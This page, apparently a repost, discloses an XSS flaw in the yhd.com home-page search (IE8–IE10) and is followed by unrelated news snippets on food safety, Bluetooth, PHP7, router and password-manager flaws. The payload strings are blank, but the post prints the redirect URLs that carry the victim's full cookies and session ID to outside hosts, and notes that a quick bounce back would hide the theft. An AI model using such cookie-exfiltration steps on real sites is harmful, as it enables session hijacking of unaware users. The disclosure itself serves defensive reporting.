发现一号店首页曝出重大XSS漏洞，在IE8，IE9，IE10上均有此漏洞

发现一号店首页曝出XSS漏洞，在IE8，IE9，IE10上均有此漏洞

1.进入一号店首页:

http://www.yhd.com

2.搜索第一个字符串或者第二个字符串：

第一个：

第二个：

（这里说明下，第一个字符和第二个字符都是单引号，第三个字符是双引号，接着!--）

搜索页面：

3.在IE8，IE9，IE10上按下搜索键

页面跳转到：

http://wz.cn/?p=test_cookie=1; abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=2.40580330.87011629.1444660093687.1444660093687.1444660713109; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=22.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=18373150176C65FE11EB46BA041B0729

或者：

http://wz0.cn/?p=abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=3.40580330.87011629.1444660093687.1444660713109.1444661000125; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=23.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=B1DE4F8D449DC5B8C133259F19339223

注：当页面跳转到第三方网站后，存储完用户信息后，可以再跳到一号店的首页，如果这个过程速度快，用户可能没有察觉到，当然360卫士是拦截了第一个，不过第二个好像没有拦截。

时间： 2024-08-02 12:50:28

发现一号店首页曝出重大XSS漏洞，在IE8，IE9，IE10上均有此漏洞的相关文章

南京被曝出发现了“喷洒蓝矾的韭菜”

日前,南京被曝出发现了"喷洒蓝矾的韭菜". 据浙江在线报道,专家称,一般情况下,叶菜类残留的农药要比其他蔬菜多.因为农药一般打在叶子上防虫治病,再传递到果实上需要一段时间:另外,夏季的叶菜更容易招虫,所以需要用药的比较多:再加上叶菜生长快,一般十几二十天就上市了,打过农药的间隔期短,农药还来不及分解掉很多. 所以,买了叶菜类的蔬菜,清洗方法也很讲究.专家介绍了两种有效方法:用流动的水多冲洗几遍:用淘米水浸泡一段时间.因为农药大多是酸性的,而淘米水是碱性的,可以去除农药.当然,必须整株清

蓝牙曝出高危漏洞你该怎么办？

据国外安全公司Armis爆料,其实验室研究人员近日发现了一项基于蓝牙漏洞而进行的攻击手法,被称为"BlueBorne".BlueBorne能够利用蓝牙协议栈中发现的8个零日漏洞,对运行Android.iOS.Windows以及Linux等操作系统的移动.桌面.IoT(物联网)等设备发起攻击,危害较大. 蓝牙曝出高危漏洞下面是研究人员展示的对Google Pixel手机的攻击视频,受害者全程无感... 此次蓝牙漏洞列表: ·Linux内核远程代码执行漏洞 - CVE-2017-1000

著名的志邦厨柜近期频频曝出“安装陷阱”

签单时笑脸相迎,测量时彬彬有礼,一旦该送货安装了,马上就冷若冰霜,送货安装延迟.安装质量低劣.安装人员态度恶劣.出现问题投诉无人理睬,著名的志邦厨柜近期频频曝出"安装陷阱",不仅让号称"专业"的志邦厨柜名不副实,而且让整个橱柜行业的形象蒙羞.顾客惊呼:买志邦厨柜搬回个"炸弹""zbom志邦,我看就是z-bomb,买了就是给自己抱回家一个bomb--炸弹!" 8月22日,在一起装修网的装修论坛里,一位用户名为"156×

PHP7曝出三个高危0-day漏洞，还有一个仍未修复

PHP7出现三个高危0-day漏洞,可允许攻击者完全控制PHP网站. 这三个漏洞出现在PHP7的反序列化机制中,而PHP5的反序列机制也曾曝出漏洞,在过去几年中,黑客利用该漏洞将恶意代码编入客户机cookie并发送,从而入侵了Drupal.Joomla.Magento.vBulletin和PornHub等网站. 漏洞概况最近,Check Point的exploit研究团队安全人员花费数个月时间,检查PHP7的反序列化机制,并发现了该机制中的"三个新的.此前未知的漏洞". 虽然此次的漏

二十余款Linksys路由器曝出安全漏洞，或可被远程控制

本文讲的是二十余款Linksys路由器曝出安全漏洞,或可被远程控制,近日,有研究人员透露,Linksys路由器中存在未修补的安全漏洞,这些漏洞将使数以千计的设备受到攻击. 周三,IOActive高级安全顾问Tao Sauvage以及独立安全研究员Antide Petit在一篇博文中说,去年底他们在20种目前广泛使用的路由器型号中发现了至少10个严重漏洞.这些漏洞从低危到高危都有,其中6个可被攻击者远程利用,2个漏洞能够让攻击者进行DoS攻击.通过发送一些请求或者滥用特定的API,路由器会停止服务

“乌云”再次曝出小米公司出现新的漏洞

DoNews 5月16日消息在小米论坛被爆数据出现泄漏之后,互联网漏洞报告平台"乌云"再次曝出小米公司出现新的漏洞,漏洞类型为"用户资料大量泄露". 乌云平台显示,小米科技出现另一安全漏洞,造成百万级别用户数据泄漏,该漏洞已经提交至小米科技官方,等待小米方面处理. 对于小米再次被曝出安全漏洞一事,部分用户开始质疑小米平台安全性.此前也曾有多位用户反馈称,自购买了小米手机之后,骚扰电话和垃圾短信增加了很多,他们怀疑这些都是由小米科技安全漏洞造成. 5月13日晚间,有

无限极被再次曝出问题

导读:无限极被再次曝出问题是在贵阳,相关报道["无限极"贵阳网点涉嫌传销业务员宣称能发大财]详揭内幕,这是来自中国经济网的调查报道.498块钱通过发展下线人员购买产品,一年可赚10万-20万,几年可买房买车,子孙后代还可以长久分享红利--.看到这些宣传,极具诱惑力.记者实际调查了解前,先在医院做了全面检查,没有发现有任何问题,而在"无限极"贵阳的一个直销点,无限极的一个销售人员给记者查出一堆"病" 称不及时调理,轻则残疾重则死亡,并且向记者推荐

小心你的密码管理器 LastPass曝出安全漏洞

今天,各种各样的金融账户.网络帐户.个人信息都需要用到密码,但对于大多数人来说,常用的密码十分有限,而且一旦使用长一些.复杂一些的新密码后,往往一段时间过后便被忘的一干二净.所以,目前有数以百万计的人依靠密码管理器来保存他们的密码,并帮助他们保障其各类网络帐户的安全.不过,密码管理器也不是万能的,近期一款流行的免费密码管理器--LastPass就被曝出了安全漏洞,使用它的用户需要多多注意了. 警惕密码管理器漏洞上周,来自Google(谷歌)安全团队的研究人员Tavis Ormandy,发现了L

全国多地超市曝出有机食品造假贴个标签变贵族

11月24日,长沙某大型超市的精品蔬菜,常被误认为是有机蔬菜. 记者未晓芳摄全国多地超市曝出"有机食品"造假,我省近期将地毯式检查有机食品市场贴个标签变贵族小心有机食品也山寨 ■记者未晓芳近日,全国各地随意标注"有机"标识.花钱购买"有机"认证等问题频频曝光,引起广泛关注.对此,省质监局下发了<关于进一步规范全省有机产品等食品农产品认证活动的紧急通知>,要求对全省各地销售场所进行"拉网式"检查,重点